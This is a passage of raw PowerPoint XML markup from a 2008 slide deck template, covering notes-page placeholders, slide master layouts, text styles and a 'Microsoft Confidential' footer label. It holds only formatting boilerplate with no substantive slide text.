            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1157288" y="449263"/>
            <a:ext cx="4541837" cy="3408362"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72710" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="503238" y="4013200"/>
            <a:ext cx="5832475" cy="4797425"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr 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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>48</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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5</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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6</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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="89730" tIns="44865" rIns="89730" bIns="44865" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62468" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="89730" tIns="44865" rIns="89730" bIns="44865"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6DE31C3D-950F-445C-A595-3D9FDC5BC304}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63492" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AF38F95C-D833-457B-A1EF-E7D6EEBD322B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64515" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64516" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{18AE7EEC-7523-4AEC-8114-1CE3067E9708}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="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730250" y="1905000"/>
            <a:ext cx="7681913" cy="1523495"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730249" y="4344988"/>
            <a:ext cx="7681913" cy="461665"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75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Tree>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2_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1000" y="1411553"/>
            <a:ext cx="8382000" cy="2200602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="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3_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1000" y="1411553"/>
            <a:ext cx="8382000" cy="2200602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="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0" y="6238875"/>
            <a:ext cx="9144001" cy="619125"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="152394" tIns="76197" rIns="152394" bIns="76197" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr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1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3B80000C-9D17-4306-9341-688A1B4A7759}" type="datetime2">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>Monday, November 10, 2008</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 1028"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6356350"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Microsoft Confidential</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 1029"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{40733CD0-C408-4013-8426-57792864569D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>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722313" y="1905000"/>
            <a:ext cx="8040688" cy="1938992"/>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1_Demo, Video etc. &quot;special&quot; slides">
    <p:bg>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369219" y="649805"/>
            <a:ext cx="7043208" cy="1523494"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368955" y="4344988"/>
            <a:ext cx="7043208" cy="461665"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75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p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722049" y="2355850"/>
            <a:ext cx="7690114" cy="1384994"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="flat" dir="t">
                <a:rot lat="0" lon="0" rev="2700000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d extrusionH="88900" contourW="2540">
              <a:bevelT w="38100" h="31750"/>
              <a:contourClr>
                <a:srgbClr val="F4A234"/>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="en-US" sz="10000" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="-642" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="11430"/>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="FF9929">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="28000">
                      <a:srgbClr val="F8F57B"/>
                    </a:gs>
                    <a:gs pos="62000">
                      <a:srgbClr val="D5B953"/>
                    </a:gs>
                    <a:gs pos="88000">
                      <a:srgbClr val="D1943B"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000"/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="75000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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381000" y="1411552"/>
            <a:ext cx="8382000" cy="2210862"/>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381000" y="1412875"/>
            <a:ext cx="8382000" cy="2210862"/>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381000" y="1411553"/>
            <a:ext cx="4114800" cy="2129814"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="339976" indent="-339976">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="673338" indent="-325424">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="2400"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="953785" indent="-288384">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1227618" indent="-273833">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1516002" indent="-280447">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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411553"/>
            <a:ext cx="4114800" cy="2129814"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="347914" indent="-347914">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="673338" indent="-339976">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="2400"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="961722" indent="-302936">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1227618" indent="-265896">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1516002" indent="-273833">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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381000" y="1411553"/>
            <a:ext cx="4114800" cy="692498"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2500" b="1"/>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380999" y="2174875"/>
            <a:ext cx="4114800" cy="1537344"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="281770" indent="-281770">
              <a:defRPr sz="2300"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="562218" indent="-265896">
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="813562" indent="-243407">
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1050354" indent="-228856">
              <a:defRPr sz="1700"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1279210" indent="-206367">
              <a:defRPr sz="17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45981" y="1411553"/>
            <a:ext cx="4117019" cy="692498"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2500" b="1"/>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6" y="2174875"/>
            <a:ext cx="4117974" cy="1537344"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="296321" indent="-296321">
              <a:defRPr sz="2300"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="570155" indent="-273833">
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="821499" indent="-244730">
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1050354" indent="-236793">
              <a:defRPr sz="1700"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1279210" indent="-220919">
              <a:defRPr sz="17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WALKIN - Prints in GRAYSCALE">
    <p:bg bwMode="ltGray">
      <p:bgPr>
        <a:blipFill dpi="0" rotWithShape="0">
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
    </p:spTree>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theme" Target="../theme/theme2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.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4">
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect l="-1000" r="-1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1000" y="230188"/>
            <a:ext cx="8382000" cy="665162"/>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1027" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="1412875"/>
            <a:ext cx="8382000" cy="2135188"/>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Tree>
  </p:cSld>
  <p:clrMap bg1="dk1" tx1="lt1" bg2="dk2" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483871" r:id="rId1"/>
    <p:sldLayoutId id="2147483872" r:id="rId2"/>
    <p:sldLayoutId id="2147483864" r:id="rId3"/>
    <p:sldLayoutId id="2147483865" r:id="rId4"/>
    <p:sldLayoutId id="2147483866" r:id="rId5"/>
    <p:sldLayoutId id="2147483867" r:id="rId6"/>
    <p:sldLayoutId id="2147483868" r:id="rId7"/>
    <p:sldLayoutId id="2147483869" r:id="rId8"/>
    <p:sldLayoutId id="2147483873" r:id="rId9"/>
    <p:sldLayoutId id="2147483874" r:id="rId10"/>
    <p:sldLayoutId id="2147483875" r:id="rId11"/>
    <p:sldLayoutId id="2147483876" r:id="rId12"/>
  </p:sldLayoutIdLst>
  <p:transition>
    <p:fade/>
  </p:transition>
  <p:hf sldNum="0" hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr lang="en-US" sz="4800" kern="1200" spc="-150" dirty="0">
          <a:ln w="3175">
            <a:noFill/>
          </a:ln>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFFFB9"/>
              </a:gs>
              <a:gs pos="36000">
                <a:srgbClr val="FFFF99"/>
              </a:gs>
              <a:gs pos="86000">
                <a:srgbClr val="F6AE1E"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect/>
          </a:gradFill>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
